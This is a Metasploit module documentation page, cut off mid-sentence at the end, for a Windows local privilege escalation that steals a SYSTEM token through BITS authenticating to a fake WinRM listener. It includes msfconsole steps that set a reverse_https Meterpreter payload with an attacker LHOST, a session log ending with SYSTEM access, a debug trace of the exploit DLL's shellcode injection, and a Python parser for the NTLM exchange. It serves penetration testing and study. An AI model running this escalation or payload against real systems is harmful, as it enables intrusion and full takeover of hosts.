SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service. - Metasploit
This page contains detailed information about how to use the exploit/windows/local/bits_ntlm_token_impersonation Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
Module: exploit/windows/local/bits_ntlm_token_impersonation
Source code: modules/exploits/windows/local/bits_ntlm_token_impersonation.rb
Disclosure date: 2019-12-06
Last modification time: 2021-09-08 21:56:02 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module exploits a BITS behavior: every time it starts, BITS tries to connect to the local Windows Remote Management server (WinRM). The module launches a fake WinRM server listening on port 5985 and triggers BITS. When BITS starts, it tries to authenticate to the rogue WinRM server, which allows a SYSTEM token to be stolen. This token is then used to launch a new process as the SYSTEM user; in the case of this exploit, notepad.exe is launched as SYSTEM. The module then writes shellcode into the memory of that new process and triggers its execution. As this exploit uses reflective DLL injection, it does not write any file to disk. See /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md for further information. Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running. Lab experiments have shown that Windows 7 does not exhibit the vulnerable behavior.
WARNING:
- As this exploit runs a service on the target (fake WinRM on port 5985), a firewall popup may appear on the target's screen. Thus, this exploit may not be completely silent.
- This exploit has been successfully tested on: Windows 10 (10.0 Build 19041) 32 bits; Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits.
- This exploit failed because of no BITS authentication attempt on: Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits.
- Windows servers are not vulnerable because a genuine WinRM service is already running, except if the user has disabled it (or if this exploit succeeds in terminating it).
- SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privileges are required.
- BITS must not be running.
- This exploit automatically performs the checks listed above; run the "check" command to run the checklist.
Module Ranking and Traits
Module Ranking:
- great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/windows/local/bits_ntlm_token_impersonation
msf exploit(bits_ntlm_token_impersonation) > show targets
... a list of targets ...
msf exploit(bits_ntlm_token_impersonation) > set TARGET target-id
msf exploit(bits_ntlm_token_impersonation) > show options
... show and set options ...
msf exploit(bits_ntlm_token_impersonation) > set SESSION session-id
msf exploit(bits_ntlm_token_impersonation) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Windows 10 and Windows servers where WinRM is not running.
Lab experiments have shown that Windows 7 is not vulnerable because the BITS service does not attempt to connect to the WinRM port (see the Module Description section of this document). Windows XP has not been tested, but if Windows 7 is not vulnerable, it is likely not vulnerable either.
Regarding Windows 10 and Windows servers, the availability of port 5985 is a necessary and sufficient condition for being vulnerable.
This module exploits a BITS behavior: BITS tries to authenticate to the local WinRM server (port 5985) even if this service is not running. As the module runs a fake service on the WinRM port to steal a SYSTEM token, this port must be available. Note, however, that the WinRM service runs natively on Windows servers, which prevents this exploit from succeeding there.
Nevertheless, if the WinRM service is disabled by an admin, or simply killed, the operating system becomes vulnerable.
Verification Steps
- Get a Meterpreter session which has either the SE_IMPERSONATE_NAME or the SE_ASSIGNPRIMARYTOKEN_NAME privilege.
- Do:
use exploits/windows/local/bits_ntlm_token_impersonation
- Do:
set SESSION <previous meterpreter session>
- Do:
set PAYLOAD windows/meterpreter/reverse_https
- Do:
set LHOST <your ip>
- Do:
set LPORT <your port>
- Do:
exploit
- A new Meterpreter session should pop up.
Options
HOST_PROCESS → The process which will be launched as SYSTEM and execute the Metasploit shellcode. This process should normally be hidden because it is launched without a graphical interface. However, during lab experiments, some processes have shown persistent screen effects: for instance, calc.exe was tested and a buggy, unresponsive window appeared and persisted until the next reboot. The default choice is notepad.exe, which has not shown any screen effects during lab experiments.
SESSION → Index of the existing Meterpreter session through which the exploit will be run.
SHUTDOWN_SERVICES → This boolean determines whether the Ruby module should attempt to terminate WinRM and BITS if they are found running. Both services must be down for the exploit to succeed (WinRM because the fake WinRM service must listen on its port, and BITS because the vulnerable behavior occurs at its startup). The default value is false for several reasons. First, the exploit is designed to wait for BITS to terminate by itself, and you may get a shell even if BITS is still running at the end of the check. Secondly, in common use cases (a previous Meterpreter session running as LOCAL SERVICE), you do not have sufficient privileges to stop services; you can only do so if you are in the Administrators group. Thirdly, attempting to terminate a service may trigger antivirus software, may be logged, and may cause problems on the target system.
WINRM_RPORT → Port on which the exploit impersonating a genuine WinRM service will listen on the remote target. The default value is the default WinRM port (5985). However, in some Windows configurations the WinRM default port can be 47001; this is the case, for instance, if no WinRM listener is configured. More information: https://docs.microsoft.com/en-us/windows/win32/winrm/obtaining-data-from-the-local-computer If the exploit fails, you may want to try other ports commonly used by WinRM.
Scenarios
Let's assume you have compromised, by whatever means, a service process such as IIS. Your Meterpreter session should then look like this:
meterpreter > sysinfo
Computer : DESKTOP-5VBUUE9
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : fr_FR
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
By default, service users hold the SE_IMPERSONATE_NAME privilege, so this exploit is mainly designed to escalate from a service account to LOCAL SYSTEM. Lab experiments have shown it works for both LOCAL SERVICE and NETWORK SERVICE:
msf6 exploit(exploit/multi/handler) > use exploit/windows/local/bits_ntlm_token_impersonation
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > exploit
[*] Started HTTPS reverse handler on https://192.168.1.33:443
[*] Executing automatic check (disable AutoCheck to override)
[!] BITS is currently running. It must be down for the exploit to succeed.
[!] BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate.
[+] The target appears to be vulnerable.
[*] Launching notepad to host the exploit...
[+] Process 5044 launched.
[*] Injecting exploit into 5044...
[*] Exploit injected. Injecting payload into 5044...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] https://192.168.1.33:444 handling request from 192.168.1.248; (UUID: fsjcbuvp) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 2 opened (192.168.1.33:444 -> 192.168.1.248:51077) at 2020-12-11 08:56:29 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Module Description
This module exploits a BITS behavior: every time it starts, BITS tries to connect to the local Windows Remote Management server (WinRM). The exploit DLL (loaded through a previous unprivileged Meterpreter session) launches a fake WinRM server which listens on port 5985 and triggers BITS. When BITS starts, it tries to authenticate to the rogue WinRM server, which allows a SYSTEM token to be stolen. This token is then used to launch a new process as the SYSTEM user. In the case of this exploit, an invisible notepad is launched and shellcode is written inside it and executed. Thus, this exploit doesn't write any file to disk.
This technique was discovered by Antonio Cocomazzi, Andrea Pierini and Roberto (0xea31), and it has been implemented in Metasploit on the basis of their proof of concept, available on their GitHub repository:
https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
https://github.com/antonioCoco/RogueWinRM
This exploit has been successfully tested on:
- Windows 10 (10.0 Build 19041) 32 bits
- Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits
This exploit failed because of no BITS authentication attempt on:
- Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits
Warnings
- SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are required.
- WinRM and, to a lesser extent, BITS must not be running.
- As this DLL exploit runs a service on the target (fake WinRM on port 5985), a firewall popup may appear on the target's screen. Thus, this exploit is not completely silent.
- Windows servers are not vulnerable because a genuine WinRM service is already running.
Debugging
You may want to debug or reverse engineer this exploit. You first need to compile the DLL sources with the DEBUGTRACE flag. Then, when launching the exploit, you get runtime debug messages. Here are the complete debug messages from a successful exploitation:
1 0.00000000 [7188] [dllmain] Entry point.
2 0.00020640 [7188] [extract_metasploit_data] WinRM port: 5985
3 0.00035820 [7188] [extract_metasploit_data] Process to launch: notepad.exe
4 0.00039800 [7188] [extract_metasploit_data] shellcode length: 626
5 0.00055150 [7188] [createProcessMethod] Attempting to enable SE_IMPERSONATE_NAME privilege...
6 0.00128340 [7188] [EnablePriv] SUCCESS: Privilege enabled.
7 0.00360550 [7188] [startListener] SUCCESS: WSAStartup initialized
8 0.00363250 [7188] [startListener] SUCCESS: getaddrinfo initialized. host:127.0.0.1, port: 5985
9 0.00439900 [7188] [startListener] SUCCESS: socket created.
10 0.00447850 [7188] [startListener] SUCCESS: socket bound.
11 0.00449390 [7188] [startListener] SUCCESS: socket is now listening for incoming connexions.
12 1.00682116 [7188] [isBitsRunning] Checking if BITS is running (It should not)...
13 1.00756419 [7188] [isBitsRunning] SUCCESS: BITS is not running.
14 1.00760865 [7188] [triggerBits] Attempting to start BITS...
15 1.27990735 [7188] [startListener] SUCCESS: socket accept stage successful.
16 1.27999246 [7188] [handleListener] Rogue WinRM service now listening for connection on port 5985.
17 1.28006208 [7188] [handleNTLMPConnection] Received http negotiate request.
18 1.28009701 [7188] [hexDump] Hexdump of packet:
19 1.28023875 [7188] [hexDump] 0000 50 4f 53 54 20 2f 77 73 6d 61 6e 20 48 54 54 50 POST /wsman HTTP
20 1.28033876 [7188] [hexDump] 0010 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e /1.1..Connection
21 1.28043485 [7188] [hexDump] 0020 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f : Keep-Alive..Co
22 1.28052747 [7188] [hexDump] 0030 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Type: appl
23 1.28062499 [7188] [hexDump] 0040 69 63 61 74 69 6f 6e 2f 73 6f 61 70 2b 78 6d 6c ication/soap+xml
24 1.28071892 [7188] [hexDump] 0050 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 31 36 0d ;charset=UTF-16.
25 1.28080654 [7188] [hexDump] 0060 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3a 20 .Authorization:
26 1.28090227 [7188] [hexDump] 0070 4e 65 67 6f 74 69 61 74 65 20 59 47 77 47 42 69 Negotiate YGwGBi
27 1.28100324 [7188] [hexDump] 0080 73 47 41 51 55 46 41 71 42 69 4d 47 43 67 47 6a sGAQUFAqBiMGCgGj
28 1.28108621 [7188] [hexDump] 0090 41 59 42 67 6f 72 42 67 45 45 41 59 49 33 41 67 AYBgorBgEEAYI3Ag
29 1.28115559 [7188] [hexDump] 00a0 49 4b 42 67 6f 72 42 67 45 45 41 59 49 33 41 67 IKBgorBgEEAYI3Ag
30 1.28125131 [7188] [hexDump] 00b0 49 65 6f 6b 49 45 51 45 35 55 54 45 31 54 55 31 IeokIEQE5UTE1TU1
31 1.28134823 [7188] [hexDump] 00c0 41 41 41 51 41 41 41 4c 65 79 43 4f 49 4a 41 41 AAAQAAALeyCOIJAA
32 1.28144515 [7188] [hexDump] 00d0 6b 41 4e 77 41 41 41 41 38 41 44 77 41 6f 41 41 kANwAAAA8ADwAoAA
33 1.28154385 [7188] [hexDump] 00e0 41 41 43 67 43 36 52 77 41 41 41 41 39 45 52 56 AACgC6RwAAAA9ERV
34 1.28162599 [7188] [hexDump] 00f0 4e 4c 56 45 39 51 4c 54 56 57 51 6c 56 56 52 54 NLVE9QLTVWQlVVRT
35 1.28167975 [7188] [hexDump] 0100 6c 58 54 31 4a 4c 52 31 4a 50 56 56 41 3d 0d 0a lXT1JLR1JPVVA=..
36 1.28172791 [7188] [hexDump] 0110 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 User-Agent: Micr
37 1.28177559 [7188] [hexDump] 0120 6f 73 6f 66 74 20 57 69 6e 52 4d 20 43 6c 69 65 osoft WinRM Clie
38 1.28182483 [7188] [hexDump] 0130 6e 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 nt..Content-Leng
39 1.28187311 [7188] [hexDump] 0140 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6f 63 th: 0..Host: loc
40 1.28192329 [7188] [hexDump] 0150 61 6c 68 6f 73 74 3a 35 39 38 35 0d 0a 0d 0a alhost:5985....
41 1.28192329 [7188]
42 1.28198123 [7188] [processNtlmBytes] -- handleType1 start --
43 1.28448606 [7188] [HandleType1] Result of AcceptSecurityContext() = status: 0x90312--
44 1.28453183 [7188] [processNtlmBytes] -- handleType1 end --
45 1.28457534 [7188] [forge_ntlmssp_challenge_responses] Forging http response type2 packet...
46 1.28464592 [7188] [hexDump] Hexdump of packet:
47 1.28471112 [7188] [hexDump] 0000 48 54 54 50 2f 31 2e 31 20 34 30 31 20 0d 0a 57 HTTP/1.1 401 ..W
48 1.28477061 [7188] [hexDump] 0010 57 57 2d 41 75 74 68 65 6e 74 69 63 61 74 65 3a WW-Authenticate:
49 1.28485692 [7188] [hexDump] 0020 20 4e 65 67 6f 74 69 61 74 65 20 6f 59 49 42 43 Negotiate oYIBC
50 1.28487158 [7188] [hexDump] 0030 7a 43 43 41 51 65 67 41 77 6f 42 41 61 45 4d 42 zCCAQegAwoBAaEMB
51 1.28495753 [7188] [hexDump] 0040 67 6f 72 42 67 45 45 41 59 49 33 41 67 49 4b 6f gorBgEEAYI3AgIKo
52 1.28498507 [7188] [hexDump] 0050 6f 48 78 42 49 48 75 54 6c 52 4d 54 56 4e 54 55 oHxBIHuTlRMTVNTU
53 1.28507006 [7188] [hexDump] 0060 41 41 43 41 41 41 41 48 67 41 65 41 44 67 41 41 AACAAAAHgAeADgAA
54 1.28509665 [7188] [hexDump] 0070 41 41 31 77 6f 72 69 6f 34 36 75 39 5a 6c 55 6e AA1worio46u9ZlUn
55 1.28518021 [7188] [hexDump] 0080 6f 63 4c 41 41 45 41 41 41 41 41 41 4a 67 41 6d ocLAAEAAAAAAJgAm
56 1.28520679 [7188] [hexDump] 0090 41 42 57 41 41 41 41 43 67 43 36 52 77 41 41 41 ABWAAAACgC6RwAAA
57 1.28528929 [7188] [hexDump] 00a0 41 39 45 41 45 55 41 55 77 42 4c 41 46 51 41 54 A9EAEUAUwBLAFQAT
58 1.28532350 [7188] [hexDump] 00b0 77 42 51 41 43 30 41 4e 51 42 57 41 45 49 41 56 wBQAC0ANQBWAEIAV
59 1.28540862 [7188] [hexDump] 00c0 51 42 56 41 45 55 41 4f 51 41 43 41 42 34 41 52 QBVAEUAOQACAB4AR
60 1.28544271 [7188] [hexDump] 00d0 41 42 46 41 46 4d 41 53 77 42 55 41 45 38 41 55 ABFAFMASwBUAE8AU
61 1.28552401 [7188] [hexDump] 00e0 41 41 74 41 44 55 41 56 67 42 43 41 46 55 41 56 AAtADUAVgBCAFUAV
62 1.28554428 [7188] [hexDump] 00f0 51 42 46 41 44 6b 41 41 51 41 65 41 45 51 41 52 QBFADkAAQAeAEQAR
63 1.28563356 [7188] [hexDump] 0100 51 42 54 41 45 73 41 56 41 42 50 41 46 41 41 4c QBTAEsAVABPAFAAL
64 1.28566802 [7188] [hexDump] 0110 51 41 31 41 46 59 41 51 67 42 56 41 46 55 41 52 QA1AFYAQgBVAFUAR
65 1.28575194 [7188] [hexDump] 0120 51 41 35 41 41 51 41 48 67 42 45 41 45 55 41 55 QA5AAQAHgBEAEUAU
66 1.28578627 [7188] [hexDump] 0130 77 42 4c 41 46 51 41 54 77 42 51 41 43 30 41 4e wBLAFQATwBQAC0AN
67 1.28586805 [7188] [hexDump] 0140 51 42 57 41 45 49 41 56 51 42 56 41 45 55 41 4f QBWAEIAVQBVAEUAO
68 1.28590250 [7188] [hexDump] 0150 51 41 44 41 42 34 41 52 41 42 46 41 46 4d 41 53 QADAB4ARABFAFMAS
69 1.28598428 [7188] [hexDump] 0160 77 42 55 41 45 38 41 55 41 41 74 41 44 55 41 56 wBUAE8AUAAtADUAV
70 1.28601146 [7188] [hexDump] 0170 67 42 43 41 46 55 41 56 51 42 46 41 44 6b 41 42 gBCAFUAVQBFADkAB
71 1.28608716 [7188] [hexDump] 0180 77 41 49 41 47 73 53 5a 71 37 62 7a 74 59 42 41 wAIAGsSZq7bztYBA
72 1.28613508 [7188] [hexDump] 0190 41 41 41 41 41 3d 3d 0d 0a 53 65 72 76 65 72 3a AAAAA==..Server:
73 1.28618777 [7188] [hexDump] 01a0 20 4d 69 63 72 6f 73 6f 66 74 2d 48 54 54 50 41 Microsoft-HTTPA
74 1.28620350 [7188] [hexDump] 01b0 50 49 2f 32 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d PI/2.0..Content-
75 1.28625381 [7188] [hexDump] 01c0 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a 00 00 Length: 0......
76 1.28625381 [7188]
77 1.28628480 [7188] [handleNTLMPConnection] Sending the 401 http response with ntlm type 2 challenge...
78 1.28635943 [7188] [handleNTLMPConnection] 401 http response sent.
79 1.28725624 [7188] [handleNTLMPConnection] SUCCESS: Received http packet with ntlm type3 response.
80 1.28733253 [7188] [hexDump] Hexdump of packet:
81 1.28734791 [7188] [hexDump] 0000 50 4f 53 54 20 2f 77 73 6d 61 6e 20 48 54 54 50 POST /wsman HTTP
82 1.28743696 [7188] [hexDump] 0010 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e /1.1..Connection
83 1.28746414 [7188] [hexDump] 0020 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f : Keep-Alive..Co
84 1.28755128 [7188] [hexDump] 0030 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Type: appl
85 1.28757834 [7188] [hexDump] 0040 69 63 61 74 69 6f 6e 2f 73 6f 61 70 2b 78 6d 6c ication/soap+xml
86 1.28766000 [7188] [hexDump] 0050 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 31 36 0d ;charset=UTF-16.
87 1.28767395 [7188] [hexDump] 0060 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3a 20 .Authorization:
88 1.28775859 [7188] [hexDump] 0070 4e 65 67 6f 74 69 61 74 65 20 6f 58 63 77 64 61 Negotiate oXcwda
89 1.28778541 [7188] [hexDump] 0080 41 44 43 67 45 42 6f 6c 6f 45 57 45 35 55 54 45 ADCgEBoloEWE5UTE
90 1.28787005 [7188] [hexDump] 0090 31 54 55 31 41 41 41 77 41 41 41 41 41 41 41 41 1TU1AAAwAAAAAAAA
91 1.28789675 [7188] [hexDump] 00a0 42 59 41 41 41 41 41 41 41 41 41 46 67 41 41 41 BYAAAAAAAAAFgAAA
92 1.28798091 [7188] [hexDump] 00b0 41 41 41 41 41 41 57 41 41 41 41 41 41 41 41 41 AAAAAAWAAAAAAAAA
93 1.28800118 [7188] [hexDump] 00c0 42 59 41 41 41 41 41 41 41 41 41 46 67 41 41 41 BYAAAAAAAAAFgAAA
94 1.28809083 [7188] [hexDump] 00d0 41 41 41 41 41 41 57 41 41 41 41 44 58 43 69 4f AAAAAAWAAAADXCiO
95 1.28811765 [7188] [hexDump] 00e0 49 4b 41 4c 70 48 41 41 41 41 44 79 65 33 4e 77 IKALpHAAAADye3Nw
96 1.28817153 [7188] [hexDump] 00f0 34 39 70 77 2f 4f 35 37 6d 67 42 70 66 51 59 57 49pw/O57mgBpfQYW
97 1.28822196 [7188] [hexDump] 0100 4b 6a 45 67 51 51 41 51 41 41 41 4f 6e 6d 38 2b KjEgQQAQAAAOnm8+
98 1.28828132 [7188] [hexDump] 0110 45 37 77 57 65 36 41 41 41 41 41 41 3d 3d 0d 0a E7wWe6AAAAAA==..
99 1.28834140 [7188] [hexDump] 0120 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 User-Agent: Micr
100 1.28840005 [7188] [hexDump] 0130 6f 73 6f 66 74 20 57 69 6e 52 4d 20 43 6c 69 65 osoft WinRM Clie
101 1.28845811 [7188] [hexDump] 0140 6e 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 nt..Content-Leng
102 1.28851688 [7188] [hexDump] 0150 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6f 63 th: 0..Host: loc
103 1.28857553 [7188] [hexDump] 0160 61 6c 68 6f 73 74 3a 35 39 38 35 0d 0a 0d 0a alhost:5985....
104 1.28857553 [7188]
105 1.28861415 [7188] [handleNTLMPConnection] Using ntlm type3 response in AcceptSecurityContext()...
106 1.28866363 [7188] [processNtlmBytes] -- handleType3 start --
107 1.28932333 [7188] [HandleType3] Result of AcceptSecurityContext() = status: 0x0--
108 1.28935909 [7188] [processNtlmBytes] -- handleType3 end --
109 1.28939426 [7188] [handleNTLMPConnection] Shutting down RogueWinRM service properly...
110 1.28953993 [7188] [handleNTLMPConnection] RogueWinRM service is now down.
111 1.32062924 [7188] [triggerBits] SUCCESS: BITS triggered!
112 1.32064247 [7188] [RunRogueWinRM] authresult 0
113 1.32069910 [7188] [IsTokenSystem] Checking if token is SYSTEM...
114 1.32073796 [7188] [IsTokenSystem] SUCCESS: Token is SYSTEM.
115 1.32080293 [7188] [RunRogueWinRM] Launching new process through CreateProcessWithTokenW().
116 1.32268882 [7188] [RunRogueWinRM] SUCCESS: target process launched as SYSTEM.
117 1.32270396 [7188] [RunRogueWinRM] Attempting to allocate executable memory space in spawned process...
118 1.32278264 [7188] [RunRogueWinRM] SUCCESS: executable memory space successfully allocated.
119 1.32282817 [7188] [RunRogueWinRM] Attempting to write shellcode in spawned process...
120 1.32286501 [7188] [RunRogueWinRM] SUCCESS: shellcode written into SYSTEM process.
121 1.32288563 [7188] [RunRogueWinRM] Attempting to trigger shellcode from spawned process...
122 1.32295120 [7188] [RunRogueWinRM] PWNED ! executing shellcode as SYSTEM.
123 1.32297337 [7188] [dllmain] Exit status: 0
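The three Negotiate tokens in the trace above (in the first POST /wsman, in the forged 401, and in the second POST) carry the whole NTLM exchange between BITS and the rogue listener. The parser below is an added example, not code from the module or the original page: it decodes those tokens with the MS-NLMP field layout and shows the shape of a local-call authentication, in which the client's NEGOTIATE proposes ordinary flags, the CHALLENGE returned by AcceptSecurityContext() sets the 0x4000 local-call bit and carries a non-zero value where the Reserved field normally sits, and the AUTHENTICATE contains no user name and no NT response at all. The token constants are transcribed from the hexdumps; all function and constant names are the example's own.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# The three Negotiate tokens, transcribed from the hexdumps in the trace above,
# one string literal per 16-byte hexdump row (Python joins adjacent literals).
TYPE1_TOKEN = (  # Authorization header of the first POST /wsman (NEGOTIATE)
    "YGwGBi" "sGAQUFAqBiMGCgGj" "AYBgorBgEEAYI3Ag" "IKBgorBgEEAYI3Ag"
    "IeokIEQE5UTE1TU1" "AAAQAAALeyCOIJAA" "kANwAAAA8ADwAoAA"
    "AACgC6RwAAAA9ERV" "NLVE9QLTVWQlVVRT" "lXT1JLR1JPVVA="
)
TYPE2_TOKEN = (  # WWW-Authenticate header of the forged 401 (CHALLENGE)
    "oYIBC" "zCCAQegAwoBAaEMB" "gorBgEEAYI3AgIKo" "oHxBIHuTlRMTVNTU"
    "AACAAAAHgAeADgAA" "AA1worio46u9ZlUn" "ocLAAEAAAAAAJgAm"
    "ABWAAAACgC6RwAAA" "A9EAEUAUwBLAFQAT" "wBQAC0ANQBWAEIAV"
    "QBVAEUAOQACAB4AR" "ABFAFMASwBUAE8AU" "AAtADUAVgBCAFUAV"
    "QBFADkAAQAeAEQAR" "QBTAEsAVABPAFAAL" "QA1AFYAQgBVAFUAR"
    "QA5AAQAHgBEAEUAU" "wBLAFQATwBQAC0AN" "QBWAEIAVQBVAEUAO"
    "QADAB4ARABFAFMAS" "wBUAE8AUAAtADUAV" "gBCAFUAVQBFADkAB"
    "wAIAGsSZq7bztYBA" "AAAAA=="
)
TYPE3_TOKEN = (  # Authorization header of the second POST /wsman (AUTHENTICATE)
    "oXcwda" "ADCgEBoloEWE5UTE" "1TU1AAAwAAAAAAAA" "BYAAAAAAAAAFgAAA"
    "AAAAAAWAAAAAAAAA" "BYAAAAAAAAAFgAAA" "AAAAAAWAAAADXCiO"
    "IKALpHAAAADye3Nw" "49pw/O57mgBpfQYW" "KjEgQQAQAAAOnm8+"
    "E7wWe6AAAAAA=="
)

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_LOCAL_CALL = 0x00004000  # reserved in MS-NLMP; "Negotiate Local Call" in Wireshark
NEGOTIATE_TARGET_INFO = 0x00800000
MSV_AV_TIMESTAMP = 7               # AvIds 1-4 are UTF-16LE computer/domain names

def ntlm_from_spnego(token_b64):
    """Strip the SPNEGO wrapper of a Negotiate token by locating the NTLMSSP signature."""
    raw = base64.b64decode(token_b64)
    start = raw.find(NTLMSSP_SIGNATURE)
    if start < 0:
        raise ValueError("token carries no NTLMSSP message")
    return raw[start:]

def _buffer(msg, off):
    # Resolve an MS-NLMP (Len, MaxLen, BufferOffset) descriptor to the bytes it points to.
    length, _maxlen, buf_off = struct.unpack_from("<HHI", msg, off)
    return msg[buf_off:buf_off + length]

def _version(msg, off):
    return "%d.%d.%d" % struct.unpack_from("<BBH", msg, off)  # major, minor, build

def parse_av_pairs(blob):
    """Decode the AV_PAIR list of a CHALLENGE message into {AvId: value}."""
    pairs, off = {}, 0
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        if av_id == 0:  # MsvAvEOL
            break
        value = blob[off + 4:off + 4 + av_len]
        pairs[av_id] = value.decode("utf-16-le") if av_id in (1, 2, 3, 4) else value.hex()
        off += 4 + av_len
    return pairs

def filetime_to_datetime(hex_le):
    ticks = int.from_bytes(bytes.fromhex(hex_le), "little")  # FILETIME: 100 ns since 1601-01-01
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)

def parse_ntlm(msg):
    """Parse a NEGOTIATE (1), CHALLENGE (2) or AUTHENTICATE (3) message into a dict."""
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type == 1:  # domain and workstation are OEM (ASCII) strings in this message
        return {"type": 1, "flags": struct.unpack_from("<I", msg, 12)[0],
                "version": _version(msg, 32), "domain": _buffer(msg, 16).decode("ascii"),
                "workstation": _buffer(msg, 24).decode("ascii")}
    if msg_type == 2:
        flags = struct.unpack_from("<I", msg, 20)[0]
        enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
        info = {"type": 2, "flags": flags, "version": _version(msg, 48),
                "target_name": _buffer(msg, 12).decode(enc), "challenge": msg[24:32].hex(),
                "context": msg[32:40].hex()}  # the "Reserved" field; non-zero on a local call
        if flags & NEGOTIATE_TARGET_INFO:
            info["target_info"] = parse_av_pairs(_buffer(msg, 40))
        return info
    if msg_type == 3:
        flags = struct.unpack_from("<I", msg, 60)[0]
        enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
        return {"type": 3, "flags": flags, "version": _version(msg, 64), "lm_response": _buffer(msg, 12).hex(),
                "nt_response": _buffer(msg, 20).hex(), "domain": _buffer(msg, 28).decode(enc),
                "user": _buffer(msg, 36).decode(enc), "workstation": _buffer(msg, 44).decode(enc)}
    raise ValueError(f"unsupported message type {msg_type}")

def describe_exchange(tokens=(TYPE1_TOKEN, TYPE2_TOKEN, TYPE3_TOKEN)):
    """Parse the three tokens and report whether they form a local-call authentication."""
    neg, chal, auth = (parse_ntlm(ntlm_from_spnego(t)) for t in tokens)
    stamp = chal.get("target_info", {}).get(MSV_AV_TIMESTAMP)
    return {"negotiate": neg, "challenge": chal, "authenticate": auth,
            "challenge_time": filetime_to_datetime(stamp) if stamp else None,
            "local_call": bool(chal["flags"] & NEGOTIATE_LOCAL_CALL)
            and auth["nt_response"] == "" and auth["user"] == ""}

if __name__ == "__main__":
    for key, value in describe_exchange().items():
        print(key, value)
```

A remote WinRM client cannot complete NTLM this way; an AUTHENTICATE with no credentials is only accepted for a same-host caller, so on the loopback interface this pattern identifies a local service authenticating to whatever is listening on the WinRM port.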
Msfconsole Usage
Here is how the windows/local/bits_ntlm_token_impersonation exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/bits_ntlm_token_impersonation
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show info
Name: SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
Module: exploit/windows/local/bits_ntlm_token_impersonation
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2019-12-06
Provided by:
Cassandre
Andrea Pierini (decoder)
Antonio Cocomazzi (splinter_code)
Roberto (0xea31)
Module side effects:
screen-effects
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HOST_PROCESS notepad.exe yes The process which will be launched as SYSTEM and execute metasploit shellcode. This process is launched without graphical interface so it is hidden.
SESSION yes The session to run this module on.
SHUTDOWN_SERVICES false yes Should this module attempt to shutdown BITS and WinRM services if they are running? Setting this parameter to true is useful only if SESSION is part of administrator group. In the common usecase (running as LOCAL SERVICE) you don't have enough privileges.
WINRM_RPORT 5985 yes Port the exploit will listen on for BITS connexion. As the principle of the exploit is to impersonate a genuine WinRM service, it should listen on WinRM port. This is in most case 5985 but in some configuration, it may be 47001.
Payload information:
Avoid: 1 characters
Description:
This module exploit BITS behavior which tries to connect to the
